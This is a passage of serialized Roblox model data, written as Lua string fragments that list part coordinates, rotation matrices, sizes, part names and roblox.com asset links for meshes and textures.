0,1,0,0,0,-1|-157.5604,12049.4853,-419.2603|-0.0379,-0.0177,0.0081|0.5,-4,1,-0,0,-1,-0,-1,0,-1,0,0|-154.0604,12049.4853,-415.2603|-0.0358,-0.0108,0.0063|-148.3604,12049.4853,-414.2603|-0.0353,-0.0084,0.0033|0,-0.2,0,-1,0,0,0,0,1,0,1,0|-145.9604,12049.4853,-414.2603|-0.0353,-0.008,0.002|-155.5604,12049.4853,-424.2603|-0.0405,-0.0254,0.0071|0.5,1,3,-0,0,-1,-0,-1,0,-1,0,0|-151.0604,12049.4853,-410.2603|-0.0332,-0.0024,0.0047|-2,1.9999,7.5,-1,0,0,0,1,0,0,0,-1|2,0.1999,-7.5,1,0,0,0,1,0,0,0,1|-159.0604,12048.8857,-415.2603|-0.0357,-0.0115,0.0099|0,-1.4001,2.5,-1,0,0,0,1,0,0,0,-1|0,-1.6,3.5,1,0,0,0,-1,0,0,0,-1|3,0.1999,6.5,-1,0,0,0,0,-1,0,-1,0|-150.0604,12054.0849,-407.7603|-0.0325,0.0017,-0.0031|3.4999,-3,-0.5,0,1,0,0,0,1,1,0,0|-146.0604,12050.5849,-404.2603|-0.0302,0.0079,0.0003|-154.0604,12047.4853,-415.2603|-0.0355,-0.0108,0.0095|3,0.1999,11.5,-1,0,0,0,0,-1,0,-1,0|-147.0604,12050.5849,-404.2603|-0.0302,0.0078,0.0009|-154.0604,12047.4853,-409.2603|-0.0323,-0.0012,0.0095|-3,0.1999,11.5,-1,0,0,0,0,-1,0,-1,0|-159.0604,12047.4853,-412.2603|-0.0339,-0.0067,0.0121|-1,1,6,0,0,1,0,-1,0,1,0,0|-159.0604,12049.2851,-412.2603|-0.0342,-0.0067,0.0093|-154.0604,12049.4853,-409.2603|-'
- ..'0.0326,-0.0012,0.0063|0.5,-1.0001,1,0,0,-1,0,-1,0,-1,0,0|-149.5604,12050.5849,-404.2603|-0.0302,0.0074,0.0022|-155.0604,12050.4853,-407.7603|-0.032,0.001,0.0052|-2,-6.7001,-1.0001,0,0,1,-1,0,0,0,-1,0|0,-3.2,-5,-1,0,0,0,0,1,0,1,0|-1,0,10,0,0,1,0,1,0,-1,0,0|-165.0604,12048.4853,-415.2603|-0.0356,-0.0124,0.0137|0,0.4,2.5,-1,0,0,0,1,0,0,0,-1|0.5,-0.4001,5.5,0,0,-1,0,-1,0,-1,0,0|-2,-0.8001,6,0,0,1,0,-1,0,1,0,0|3,0.1999,0.5,1,-0,0,0,0,-1,0,1,0|-165.0604,12050.4853,-415.2603|-0.0359,-0.0124,0.0105|-159.0604,12048.8857,-409.2603|-0.0325,-0.0019,0.0099|-3,0.1999,6.5,-1,0,0,0,0,-1,0,-1,0|0,-0.4001,3.5,-1,0,0,0,1,0,0,0,-1|-157.5604,12049.4853,-405.2603|-0.0305,0.0047,0.0081|-0.5,-4,1,0,0,1,0,1,0,-1,0,0|-167.0604,12049.6855,-412.2603|-0.0342,-0.0079,0.0128|3.5,-0.8,0.5,-1,0,0,0,1,0,0,0,-1|-153.5604,12050.5849,-401.2603|-0.0286,0.0116,0.0043|-152.0604,12050.5849,-398.6603|-0.0272,0.016,0.0035|0,2.6,-1,-1,0,0,0,-1,0,0,0,1|-170.5604,12050.4853,-413.7603|-0.0351,-0.0108,0.0134|3.5,1,-1,1,0,0,0,1,0,0,0,1|0,0.7999,0,0,-1,0,0,0,-1,1,0,0|-165.0604,12050.4853,-409.2603|-0.0328,-0.0028,0.0105|-170.5604,12047.6855,-413.7603|-0.0347,-0.0108,0.0179|1.5,0.2,-7.5,-1,0,0,0,-1,0,0,0,1|1,0.7999,-5.5,0,0,-1,0,1,0,1,0,0|0,-0.8001,0,0,-1,0,0,0,1,-1,0,0|-170.5604,12048.8857,-413.7603|-0.0349,-0.0108,0.0159|-155.5604,12049.4853,-401.2603|-0.0284,0.0113,0.0071|-165.0604,12048.4853,-409.2603|-0.0325,-0.0028,0.0137|-3,0.1999,0.5,1,-0,0,0,0,-1,0,1,0|2,-0.8001,6,0,0,-1,0,-1,0,-1,0,0|-158.5604,12050.5849,-401.2603|-0.0286,0.0109,0.0069|0,0,1,-1,0,0,0,1,0,0,0,-1|3,-0.6,0,-1,0,0,0,0,1,0,1,0|-0.5,0.0999,-3.5,0,0,1,1,0,0,0,1,0|-170.5604,12050.4853,-410.7603|-0.0336,-0.006,0.0134|-1,-2,-5.5,0,0,1,0,-1,0,1,0,0|0,0.7999,0,-0,1,0,0,0,-1,-1,0,0|3.5,1,1,-1,0,0,0,1,0,0,0,-1|-170.5604,12047.6855,-410.7603|-0.0332,-0.006,0.0179|-1.5,0.2,-7.5,-1,0,0,0,-1,0,0,0,1|-1,0.7999,-5.5,0,0,1,0,1,0,-1,0,0|-170.56'
- ..'04,12048.8857,-410.7603|-0.0333,-0.006,0.0159|-1,-0.4001,-5.5,0,0,1,0,-1,0,1,0,0|-170.5604,12051.2851,-412.2603|-0.0345,-0.0084,0.0121|0,0.7999,0.5,-1,0,0,0,1,0,0,0,-1|-174.0604,12049.4853,-412.2603|-0.0342,-0.0089,0.0168|79.4396,12059.4853,-412.2603|-0.5,6.3999,-31.5,-1,-0,0,0,0,-1,-0,-1,0|79.4396,12046.2851,-412.2603|18.5,-6.4,31.5,0,-1,-0,0,0,1,-1,0,0|78.9396,12052.8857,-443.7603|47.9396,12052.8857,-393.7603|-33.0601,12052.0859,-389.2604|-34.5601,12052.0859,-392.7602|-34.5603,12057.5917,-389.2602|-34.5601,12052.0859,-390.7602|-34.5601,12052.0859,-396.7602|-34.0601,12052.0859,-389.2602|-34.5601,12052.0859,-394.7602|-43.56,12046.5869,-389.7602|-43.5603,12058.5888,-389.2602|-52.5603,12057.5878,-389.2603|-52.5601,12052.0849,-396.7604|-52.5601,12052.0849,-390.7604|-52.5601,12052.0849,-392.7604|-52.5601,12052.0849,-394.7604|-53.0602,12052.0849,-389.2604|-54.0601,12052.0849,-389.2604|-135.0604,12052.8857,-394.2603|-31.5,-0.2,-18,0,1,-0,0,0,1,1,0,-0|-31.5,0.1999,-18,-0,1,0,0,0,-1,-1,0,0|75.9868,12049.499,-424.7498|76.988,12049.499,-426.7492|74.9865,12049.2041,-424.7485|78.9868,12049.498,-424.7481|76.9855,12049.499,-422.7492|77.4872,12053.0986,-424.7491|77.4396,12046.6855,-412.2603|3,0.5999,11.4999,-1,0,0,0,0,-1,0,-1,0|3,2,6.4999,-1,0,0,0,0,-1,0,-1,0|82.4396,12047.8857,-412.2603|68.9396,12048.6855,-405.2603|68.9396,12048.6855,-419.2603|66.9396,12048.6855,-423.2603|66.9396,12048.6855,-400.2603|-0.5,0.5999,0,0,-1,0,-0,0,-1,1,0,0|82.4396,12047.4853,-412.2603|0,0,-7.5001,1,0,0,0,1,0,0,0,1|56.9396,12054.0849,-407.7603|0,0,0.9999,1,0,0,0,-1,0,0,0,-1|61.9396,12054.0849,-407.7603|58.4396,12054.0849,-407.7603|60.2397,12049.4853,-414.2603|57.9396,12050.5849,-404.2603|0,0,0.4999,1,-0,0,0,-1,0,0,-0,-1|0.5,-3.5,0.4999,0,0,-1,1,0,0,0,-1,0|63.9396,12050.5849,-398.6603|0,2.6,1,1,-0,0,0,-1,0,0,-0,-1|56.9396,12054.0849,-416.7603|58.9396,12050.5849,-404.2603|66.9396,12050.4'
- ..'853,-407.7603|61.4396,12050.5849,-404.2603|-0.5,0.0999,-5.5,0,0,1,-1,0,0,0,-1,0|0.5,-3.5,0.4999,0,0,-1,-1,0,0,0,1,0|65.4396,12050.5849,-401.2603|0,0,3.9999,-1,0,0,0,1,0,0,0,-1|70.4396,12050.5849,-401.2603|57.8396,12049.4853,-414.2603|62.9396,12049.4853,-410.2603|58.4396,12054.0849,-416.7603|69.4396,12049.4853,-405.2603|65.9396,12049.4853,-409.2603|0.5,0,1,0,0,-1,0,-1,0,-1,0,0|60.2397,12049.4853,-410.2603|-0.5,0,0,0,0,1,0,-1,0,1,0,0|57.8396,12049.4853,-410.2603|67.4396,12049.4853,-400.2603|62.9396,12049.4853,-414.2603|-2,1.9999,7.4999,-1,0,0,0,1,0,0,0,-1|1,-2,-2.5,-1,0,0,0,-1,0,0,0,1|70.9396,12048.8857,-409.2603|0,-1.4001,2.4999,-1,0,0,0,1,0,0,0,-1|0.5,-1.6,3.9999,0,0,-1,0,-1,0,-1,0,0|61.9396,12054.0849,-416.7603|57.9396,12050.5849,-420.2603|-0.5,-3.5,0.4999,0,0,1,-1,0,0,0,-1,0|0,0,-0.5001,-1,0,0,0,-1,0,0,0,1|65.9396,12047.4853,-409.2603|0.5,-2,1,0,0,-1,0,-1,0,-1,0,0|58.9396,12050.5849,-420.2603|65.9396,12047.4853,-415.2603|70.9396,12047.4853,-412.2603|70.9396,12049.2851,-412.2603|0,0.2,0,-1,0,0,0,0,-1,0,-1,0|0.4999,-0.2,-2,0,0,-1,0,1,0,1,0,0|65.9396,12049.4853,-415.2603|61.4396,12050.5849,-420.2603|-0.5,0.0999,5.5,0,0,1,1,0,0,0,1,0|-0.5,-3.5,0.4999,0,0,1,1,0,0,0,1,0|0,0,0.5,-1,0,0,0,1,0,0,0,-1|66.9396,12050.4853,-416.7603|76.9396,12048.4853,-409.2603|76.9396,12050.4853,-409.2603|70.9396,12048.8857,-415.2603|0.5,-1.6,-4,0,0,-1,0,-1,0,-1,0,0|69.4396,12049.4853,-419.2603|78.9396,12049.6855,-412.2603|65.4396,12050.5849,-423.2603|63.9396,12050.5849,-425.8603|82.4396,12050.4853,-410.7603|76.9396,12050.4853,-415.2603|0.5,0,-10,0,0,-1,0,1,0,1,0,0|82.4396,12047.6855,-410.7603|82.4396,12048.8857,-410.7603|67.4396,12049.4853,-423.2603|-0.5,0,2.9999,0,0,1,0,1,0,-1,0,0|76.9396,12048.4853,-415.2603|-0.5,-0.4001,5.5,0,0,1,0,-1,0,1,0,0|-2,1,-6,0,0,1,0,-1,0,1,0,0|70.4396,12050.5849,-423.2603|82.4396,12050.4853,-413.7603|0,0.7999,0,0,1,0,0,0,-1,-1,0,0|82.4396,12047.6'
- ..'855,-413.7603|82.4396,12048.8857,-413.7603|82.4396,12051.2851,-412.2603|85.9396,12049.4853,-412.2603|79.4396,12059.4853,-348.2603|75.9868,12049.499,-360.7498|76.988,12049.499,-362.7492|74.9865,12049.2041,-360.7485|78.9868,12049.498,-360.7481|76.9855,12049.499,-358.7492|77.4872,12053.0986,-360.7491|77.4396,12046.6855,-348.2603|3,1.5999,-0.5,1,0,0,0,0,-1,0,1,0|-3,1.9999,6.4999,-1,0,0,0,0,-1,0,-1,0|82.4396,12047.8857,-348.2603|68.9396,12048.6855,-341.2603|68.9396,12048.6855,-355.2603|66.9396,12048.6855,-359.2603|66.9396,12048.6855,-336.2603|82.4396,12047.4853,-348.2603|56.9396,12054.0849,-343.7603|61.9396,12054.0849,-343.7603|-3.5,-3,-0.5001,0,-1,0,0,0,1,-1,0,0|58.4396,12054.0849,-343.7603|60.2397,12049.4853,-350.2603|0.5,-1.0001,6.6999,0,0,-1,-1,0,0,0,1,0|57.9396,12050.5849,-340.2603|63.9396,12050.5849,-334.6603|56.9396,12054.0849,-352.7603|0,0.3999,10,-1,0,0,0,0,-1,0,-1,0|58.9396,12050.5849,-340.2603|66.9396,12050.4853,-343.7603|61.4396,12050.5849,-340.2603|0,0,-0.5001,1,0,0,0,1,0,0,0,1|65.4396,12050.5849,-337.2603|0,2.6,0.5,1,0,0,-0,-1,-0,0,0,-1|70.4396,12050.5849,-337.2603|57.8396,12049.4853,-350.2603|62.9396,12049.4853,-346.2603|58.4396,12054.0849,-352.7603|69.4396,12049.4853,-341.2603|0.5,-4,1,0,0,-1,0,-1,0,-1,0,0|65.9396,12049.4853,-345.2603|60.2397,12049.4853,-346.2603|57.8396,12049.4853,-346.2603|67.4396,12049.4853,-336.2603|0.5,1,2.9999,0,0,-1,0,-1,0,-1,0,0|62.9396,12049.4853,-350.2603|1,0,-2.5,-1,0,0,0,-1,0,0,0,1|70.9396,12048.8857,-345.2603|61.9396,12054.0849,-352.7603|57.9396,12050.5849,-356.2603|-0.5,0.0999,9,0,0,1,-1,0,0,0,-1,0|0,0,-0.5,-1,0,0,0,-1,0,0,0,1|65.9396,12047.4853,-345.2603|3,0.1999,11.4999,-1,0,0,0,0,-1,0,-1,0|58.9396,12050.5849,-356.2603|65.9396,12047.4853,-351.2603|70.9396,12047.4853,-348.2603|-4,0.2,1.5,0,0,1,0,-1,0,1,0,0|1,0.9999,5.9999,0,0,-1,0,-1,0,-1,0,0|0.5,-2,2,0,0,-1,0,1,0,1,0,0|0.5,-2,-2,0,0,-1,0,1,0,1,0,0|70.9396,'
- ..'12049.2851,-348.2603|65.9396,12049.4853,-351.2603|61.4396,12050.5849,-356.2603|66.9396,12050.4853,-352.7603|-1,0,9.9999,0,0,1,0,1,0,-1,0,0|76.9396,12048.4853,-345.2603|5.5,-2.0001,-0.5,-1,0,0,0,-1,0,0,0,1|76.9396,12050.4853,-345.2603|70.9396,12048.8857,-351.2603|69.4396,12049.4853,-355.2603|78.9396,12049.6855,-348.2603|-3.5,-0.8,0.5,-1,0,0,0,1,0,0,0,-1|65.4396,12050.5849,-359.2603|-0.5,0.0999,1.5,0,0,1,-1,0,0,0,-1,0|63.9396,12050.5849,-361.8603|82.4396,12050.4853,-346.7603|76.9396,12050.4853,-351.2603|82.4396,12047.6855,-346.7603|82.4396,12048.8857,-346.7603|67.4396,12049.4853,-359.2603|76.9396,12048.4853,-351.2603|5.5,-0.8,-0.5,1,0,0,0,1,0,0,0,1|2,-0.8001,5.9999,0,0,-1,0,-1,0,-1,0,0|70.4396,12050.5849,-359.2603|82.4396,12050.4853,-349.7603|82.4396,12047.6855,-349.7603|82.4396,12048.8857,-349.7603|0,-0.4001,0,0,1,0,0,0,1,1,0,0|82.4396,12051.2851,-348.2603|85.9396,12049.4853,-348.2603|78.9396,12052.8857,-379.7603|-0.5,0.1999,-31.5,-1,-0,-0,-0,-0,-1,-0,-1,-0|-0.5,-0.2,-31.5,1,0,0,0,0,1,0,-1,0|79.9396,12052.8857,-380.7603|0.5,-0.2,31.5,-1,0,0,0,0,1,0,1,0|79.4396,12046.2851,-348.2603|47.9396,12052.8857,-366.2603|-31.5,0.1999,-18,0,1,0,0,0,-1,-1,0,0|46.9396,12052.0878,-339.2602|44.9396,12052.0878,-339.2602|42.9396,12052.0878,-339.2602|44.9399,12052.0888,-357.2602|46.9399,12052.0888,-357.2602|42.9399,12052.0888,-357.2602|40.9437,12052.0878,-339.2602|38.9396,12052.0878,-339.2602|40.9438,12052.0878,-357.2602|37.4396,12052.0878,-337.7602|35.9396,12052.0878,-339.2602|33.9396,12052.0878,-339.2602|29.9399,12052.0878,-357.2602|33.9399,12052.0878,-357.2602|37.4396,12052.0888,-358.7602|37.4396,12058.5908,-348.2602|38.9399,12052.0888,-357.2602|37.4396,12052.0878,-338.7602|37.4396,12057.5917,-357.2602|35.9399,12052.0888,-357.2602|31.9396,12052.0878,-339.2602|29.9396,12052.0878,-339.2602|31.9399,12052.0878,-357.2602|37.4396,12057.5908,-339.2602|37.4399,12046.5898,-34'
- ..'8.2602|37.4399,12052.0888,-357.7602|17.4396,12052.0878,-337.7602|17.4396,12052.0878,-338.7602|22.9396,12052.0878,-339.2602|17.4396,12057.5898,-339.2602|18.9396,12052.0878,-339.2602|24.9396,12052.0878,-339.2602|20.9437,12052.0869,-339.2602|17.4396,12057.5917,-357.2602|17.4399,12046.5898,-348.2602|26.9399,12052.0878,-357.2602|27.9399,12052.0878,-357.2602|17.4396,12058.5898,-348.2602|24.9399,12052.0878,-357.2602|27.9396,12052.0878,-339.2602|18.9399,12052.0878,-357.2602|17.4399,12052.0878,-357.7602|20.9438,12052.0878,-357.2602|26.9396,12052.0878,-339.2602|17.4396,12052.0878,-358.7602|22.9399,12052.0878,-357.2602|15.9396,12052.0878,-339.2602|15.9399,12052.0878,-357.2602|13.9396,12052.0878,-339.2602|13.9399,12052.0878,-357.2602|11.9396,12052.0878,-339.2602|11.9399,12052.0878,-357.2602|0.9437,12052.0869,-339.2602|0.9438,12052.0869,-357.2602|2.9399,12052.0878,-357.2602|2.9396,12052.0869,-339.2602|7.9396,12052.0878,-339.2602|7.9399,12052.0878,-357.2602|4.9399,12052.0878,-357.2602|6.9399,12052.0878,-357.2602|9.9399,12052.0878,-357.2602|4.9396,12052.0869,-339.2602|6.9396,12052.0869,-339.2602|9.9396,12052.0878,-339.2602|-6.0604,12052.0869,-339.2602|-1.0601,12052.0878,-357.2602|-2.5604,12057.5898,-339.2602|-2.5604,12057.5908,-357.2602|-2.5604,12052.0869,-337.7602|-2.5604,12052.0869,-338.7602|-1.0604,12052.0869,-339.2602|-4.0604,12052.0869,-339.2602|-2.5601,12052.0869,-357.7602|-2.5601,12046.5888,-348.2602|-4.0601,12052.0869,-357.2602|-2.5604,12052.0878,-358.7602|-2.5604,12058.5898,-348.2602|-10.0602,12052.0869,-357.2602|-8.0602,12052.0869,-357.2602|-6.0602,12052.0869,-357.2602|-10.0604,12052.0869,-339.2602|-8.0604,12052.0869,-339.2602|-12.0604,12052.0869,-339.2602|-12.0602,12052.0869,-357.2602|Brick|-13.1781,12131.8955,-330.353|-10.62,-51.1301,-27.8|6,0.4,6|0.4274,0.4313,0.4235|-21.5604,12120.9853,-352.7603|0,0,0.9333|-21.5604,12119.2851,-350.7603|2,2.4,1|0,-1.2'
- ..'001,0,1,0,0,-0,-0,-1,0,1,0|-2,-0.5,0,-0,1,-0,0,0,1,1,0,0|-21.5604,12119.2851,-354.7603|2,-0.5,0,-0,1,-0,0,0,1,1,0,0|1056|-22.0604,12122.0849,-360.2603|3,8,8|Part-to-Wedge Strong Joint|-1.5,-4,-4,-0,0,-1,0,1,0,1,0,-0|-4,-0.5,3.2999,0.9999,0,0,0,0,0.9999,0,-1,0|-4,5.6999,0.25,0.9999,0,0,0,-1,0,0,0,-1|-1.5,0,0,-0,-0,-1,0,1,0,1,0,0|6.5,-3.5,-1.5,-0.0001,0,-1,0,-1,0,-1,-0,-0.0001|-23.0604,12120.2851,-354.7603|1,0.4,1|-20.3604,12122.4853,-354.7603|0,0,-90|4,0.4,1|-20.3604,12122.4853,-350.7603|-20.7604,12123.9833,-350.7603|-90,-90,0|3,0.4,3|http://www.roblox.com/asset/?id=48736318|-20.7604,12123.9833,-354.7603|-89.9701,-0.48,-89.52|http://www.roblox.com/asset/?id=40288979|1.2999,1.8979,4,-0.0001,1,-0.0001,0.9999,0,0,0,-0.0001,-1|-13.0602,12052.0869,-339.2602|-13.0601,12052.0859,-357.2602|-17.0602,12052.0869,-339.2602|-17.0601,12052.0859,-357.2602|-22.5601,12052.0859,-337.7602|-21.0601,12052.0859,-357.2602|-15.0601,12052.0859,-357.2602|-19.0601,12052.0859,-357.2602|-19.0602,12052.0869,-339.2602|-22.5604,12057.5908,-339.2602|-22.5602,12052.0859,-338.7602|-22.5604,12058.5888,-348.2602|-21.0602,12052.0859,-339.2602|-22.5604,12057.5888,-357.2602|-15.0602,12052.0869,-339.2602|-18.4537,12136.8505,-332.6966|24.5599,-7.9801,-47.39|-19.556,12137.8857,-332.2037|32.75,0.49,-48|-21.42,12139.6357,-330.3417|48.84,20.7299,-44.03|-17.3009,12135.7685,-332.8643|16.53,-16.1101,-45.5601|-16.1479,12134.6845,-332.6995|8.8199,-24.23,-42.66|-20.5594,12138.8271,-331.4072|40.9199,9.81,-47.0801|-17.0604,12111.0849,-339.2603|-15.0448,12133.6494,-332.2097|1.6,-32.64,-38.7401|-14.0402,12132.706,-331.4162|-4.95,-41.55,-33.7901|0.0509,0.4117,0.6745|-17.0598,12111.0595,-366.2584|-0.13,-0.01,0.0099|-0.0039,-0.0086,-0.0314|1,12,16|-17.0604,12111.0849,-357.2603|-17.0604,12111.0761,-348.2603|0,-0.0117,0.0059|-17.0604,12111.0849,-374.7603|1,12,1|-24.0604,12121.3847,-360.2603|89.9499,0,0|6,1,0.4'
- ..'|http://www.roblox.com/asset?id=53857735|-23.8104,12123.7851,-360.2603|6,3,0.5|http://www.roblox.com/asset?id=53857544 |-24.0604,12118.5849,-350.7603|0,-90,-180|1,1,3|-24.5579,12104.5458,-367.2443|0,-90.0101,0.1299|16,1,16|-24.0602,12052.0859,-339.2602|-24.0601,12052.0859,-357.2602|-22.5601,12046.5869,-348.2602|-22.5601,12052.0859,-358.7602|-22.5601,12052.0859,-357.7602|-24.5604,12104.4853,-348.2603|22,1.2,16|-26.0604,12118.5849,-355.7603|11,1,1|-30.0604,12118.5849,-361.7603|13,1,1|-26.0604,12118.5849,-339.7603|-90,-180,0|1,21,1|-26.0643,12052.0859,-339.2602|-28.0601,12052.0859,-357.2602|-26.064,12052.0849,-357.2602|-30.0601,12052.0849,-357.2602|-28.0602,12052.0859,-339.2602|-30.0602,12052.0859,-339.2602|-25.5592,12111.0634,-374.7619|0.1,90.0199,0|-0.0062,-0.0101,0.0175|-32.0601,12052.0849,-357.2602|-32.0602,12052.0859,-339.2602|-33.0604,12081.5849,-348.7603|21,47,1|-34.5601,12052.0859,-387.7602|-34.5601,12052.0849,-385.7562|-34.5601,12052.0859,-379.7602|-34.5601,12052.0859,-383.7602|-34.5601,12052.0859,-381.7602|-34.5602,12052.0859,-363.7602|-34.0602,12052.5859,-338.7602|-34.5602,12052.0859,-372.7602|-34.5602,12052.0849,-365.7563|-34.5602,12052.0859,-334.7602|-34.5603,12057.5908,-369.2602|-34.5602,12052.0859,-332.7602|-34.0602,12052.0859,-369.2602|-34.5602,12052.0859,-359.7602|-34.0599,12052.5849,-357.7602|-34.5602,12052.0859,-361.7602|-34.5602,12052.0859,-374.7602|-34.5602,12052.0859,-376.7602|-34.5602,12052.0859,-336.7602|-34.5602,12052.0859,-370.7602|-34.5602,12052.0859,-367.7602|-33.0602,12052.0859,-369.2604|-34.5602,12052.0859,-378.7602|-34.5604,12111.0849,-374.7603|-42.5613,12102.0751,-348.2603|2,2,4|0,1,0,-1,-0,-0,0,0,1,0,1,0|0,-1,0,-1,0,0,-0.0001,0,1,0,1,0|1,-0.0001,0,0,0,-1,0,1,-0.0001,1,0,0|-42.5609,12088.0751,-348.2603|-42.561,12092.0751,-348.2603|0,-1,0,1,0,0,-0,-0,-1,0,1,0|-0.0001,1,0,1,0,-0.0001,0,0,-1,0,1,0|-42.5609,12090.0751,-348.2'
- ..'603|-42.5607,12082.0751,-348.2603|0,-1.0001,0,-1,0,0,-0.0001,0,1,0,1,0|-42.561,12094.0751,-348.2603|-42.5602,12068.0751,-348.2603|-42.5606,12078.0751,-348.2603|-42.5612,12100.0751,-348.2603|-42.5601,12062.0751,-348.2603|-42.5603,12070.0751,-348.2603|-42.5599,12056.0751,-348.2603|-0.0001,0.9999,0,1,0,-0.0001,0,0,-1,0,1,0|1,0,0,0,0,-1,0,1,-0.0001,1,0,0|-42.5601,12064.0751,-348.2603|-42.5604,12072.0751,-348.2603|-43.5604,12104.5849,-340.7603|5,20,1|-42.5598,12054.0751,-348.2603|-42.5606,12080.0751,-348.2603|-37.0604,12117.5849,-348.2603|41,1,54|0,-0.5,0,1,0,0,-0,-0,-1,0,1,0|-15,-4,12,-1,-0.0001,0,0,0,0.9999,0,0.9999,0|-25.5,-4,8.5,0,1,0,0,0,1,1,-0,-0|-42.56,12060.0751,-348.2603|-42.5599,12058.0751,-348.2603|-44.0604,12081.5849,-358.7603|-43.0604,12081.5849,-337.7603|-43.56,12046.5869,-368.7602|-43.5604,12058.5888,-369.2602|-44.5602,12066.0751,-348.2603|-1,0,0,0,0,1,0,1,0,-1,0,0|-44.5602,12068.0751,-348.2603|-1,-0.0001,0,0,0,1,0,1,0,-1,0,0|-44.561,12092.0751,-348.2603|-44.5607,12084.0751,-348.2603|-36.0604,12104.5849,-348.2603|10,5,1|-44.5606,12078.0751,-348.2603|-1.0001,0,0,0,0,1,0,1,0,-1,0,0|-44.5608,12086.0751,-348.2603|-44.5612,12098.0751,-348.2603|-44.561,12094.0751,-348.2603|-44.5606,12080.0751,-348.2603|-44.5601,12064.0751,-348.2603|-44.5611,12096.0751,-348.2603|-44.5612,12100.0751,-348.2603|-44.5604,12072.0751,-348.2603|-44.5604,12074.0751,-348.2603|-44.5607,12082.0751,-348.2603|-44.5598,12054.0751,-348.2603|-44.5605,12076.0751,-348.2603|-44.5609,12088.0751,-348.2603|-44.5599,12056.0751,-348.2603|-44.5609,12090.0751,-348.2603|-44.56,12060.0751,-348.2603|-44.5598,12052.0751,-348.2603|-44.5599,12058.0751,-348.2603|-44.5601,12062.0751,-348.2603|-43.5604,12104.5849,-355.7603|-44.5603,12070.0751,-348.2603|-43.5604,12111.0761,-374.7603|-0.0001,-0.0126,-0.0001|Handle|-37.7957,12133.1083,-366.3154|-3.6901,-0.3301,0.18|0.0826,-0.0234,0.0324|20,28.8,20|25'
- ..',25,25|http://www.roblox.com/asset/?id=1095752|http://www.roblox.com/asset/?id=1095753|-43.5604,12104.4853,-367.2603|-44.5613,12102.0751,-348.2603|-42.5613,12104.0751,-348.2603|-42.5612,12098.0751,-348.2603|-42.5611,12096.0751,-348.2603|-44.5613,12104.0751,-348.2603|-42.5608,12086.0751,-348.2603|-42.5605,12076.0751,-348.2603|-42.5604,12074.0751,-348.2603|-42.5607,12084.0751,-348.2603|-42.5602,12066.0751,-348.2603|-42.5598,12052.0751,-348.2603|-42.5596,12048.0751,-348.2603|-66.6895,12143.2265,-338.7603|63.5999,-90,180|3,9.6,1|1,1.5,1|1,0.9607,0|-68.8481,12139.0029,-338.7603|0,0,33|4,2.4,5|-67.5604,12122.4853,-336.6603|90,0,0|6,1.2,4|1,2,2|-67.5604,12119.2851,-338.2603|6,2.4,6|-66.5606,12135.4804,-338.7603|26,1.2,25|-67.541,12136.9892,-338.7603|6,2.4,7|-0.0001,0.5999,0,0.9999,0,0,0,0,-1,0,1,0|-67.5604,12127.6845,-338.2603|2,14.4,2|-68.5606,12111.0673,-362.254|89.9,0,-180|0,0,-2,-1,-0,-0,0,1,0,-0,-0,-1|0,-0.0001,2,-1,0,0,-0.0001,1,0,0,0,-1|0,0,-2,1,0,0,0,1,0,-0.0001,0,1|-68.5606,12115.0673,-362.261|-68.5606,12111.0634,-364.254|-68.5606,12107.0673,-362.2469|-68.5606,12107.0634,-364.2469|0,0,2,-1,0,0,-0.0001,1,0,0,0,-1|0,1,0,1,-0.0001,-0.0001,0,0,-1,-0.0001,1,0|-62.5604,12104.4853,-367.2603|-67.5604,12122.4853,-339.8603|90,-180,0|-67.0604,12122.0849,-348.2603|2,1.5,3.5,0,-0,-1,-1,0,0,0,1,0|0,-4,0,1,0,0,-0,-0,-1,0,1,0|3,-0.5,-7.5,1,0,0,0,0,1,0,-1,0|-1.5,-1.3,-1.8989,0,-0.0001,0.9999,1,0,-0.0001,-0.0001,0.9999,0|-62.5604,12104.4853,-348.2603|-63.5604,12118.5849,-349.7603|4,1,1|-61.0604,12118.5849,-349.2603|1,18,1|-64.0604,12118.5849,-357.7603|5,1,1|-61.5588,12111.0595,-374.763|-0.13,89.97,0.0199|0.0003,0.0024,0.0134|-64.0604,12117.5849,-340.7603|13,1,39|-52.5604,12111.0849,-374.7603|0.2|0.6|-63.5604,12117.7851,-370.7603|-90,90,0|7,12,1|1,1,0.25|10|-51.0604,12104.5849,-348.2603|-63.0606,12127.6806,-338.2603|0,0,29.3999|1,14.4,2|1,1.2,1|-68.064,12052.0839,-3'
- ..'57.2602|-64.5604,12058.5878,-348.2603|-70.0601,12052.0839,-357.2602|-61.0601,12052.0849,-357.2602|-64.5604,12057.5898,-339.2603|-64.5601,12052.0849,-358.7602|-63.0601,12052.0849,-357.2602|-54.0604,12081.5849,-347.7603|-64.5604,12057.5878,-357.2603|-67.5604,12120.9853,-355.7603|-64.5601,12052.0849,-357.7603|-65.0604,12121.3847,-348.2603|89.97,180,0|-68.7604,12122.4853,-353.7603|0,-180,-90|-61.0604,12118.5849,-332.7603|1,7,1|-66.0601,12052.0849,-357.2602|-70.0604,12111.0849,-374.7603|-52.5601,12052.0849,-385.7564|-67.5604,12119.2851,-357.7603|-2,-0.5,0,0,1,0,0,0,1,1,-0,-0|-68.3604,12123.9833,-357.7603|-65.3104,12123.7851,-348.2603|-68.3604,12123.9833,-353.7603|-89.9701,179.52,-89.52|-59.5604,12119.2851,-338.2603|2,2.4,4|2,2,1|-52.5601,12052.0849,-379.7604|-70.0611,12111.0634,-366.261|-0.1001,0.0099,0|-0.0055,-0.0194,-0.0061|-68.7604,12122.4853,-357.7603|-66.0604,12120.2851,-353.7603|-70.0604,12111.0849,-357.2603|-52.5601,12052.0849,-387.7604|-67.5604,12119.2851,-353.7603|2,-0.5,0,0,1,0,0,0,1,1,-0,-0|-64.0604,12117.5849,-374.7603|-70.0604,12117.5849,-367.2603|14,1,1|-52.5601,12052.0849,-383.7604|-63.5604,12117.5849,-363.7603|-52.5601,12052.0849,-381.7604|-54.0602,12052.0849,-369.2604|-52.5602,12052.0849,-370.7604|-57.0601,12052.0849,-357.2602|-55.0601,12052.0849,-357.2602|-52.5602,12052.0849,-367.7604|-52.5602,12052.0849,-372.7604|-52.5602,12052.0849,-365.7564|-52.5602,12052.0849,-361.7604|-52.5602,12052.0849,-378.7604|-52.5602,12052.0849,-374.7604|-53.5601,12046.5859,-348.2602|-52.5602,12052.0849,-376.7604|-53.0602,12052.0849,-369.2604|-59.0601,12052.0849,-357.2602|-52.5603,12057.5878,-369.2603|-53.0602,12052.5859,-357.7602|-52.5602,12052.0849,-363.7604|-52.5602,12052.0849,-359.7604|-44.5597,12050.0751,-348.2603|-44.5596,12048.0751,-348.2603|-42.5597,12050.0751,-348.2603|-68.5606,12115.0634,-364.261|0,0,-2,1,0,-0.0001,0,1,0,0,0,1|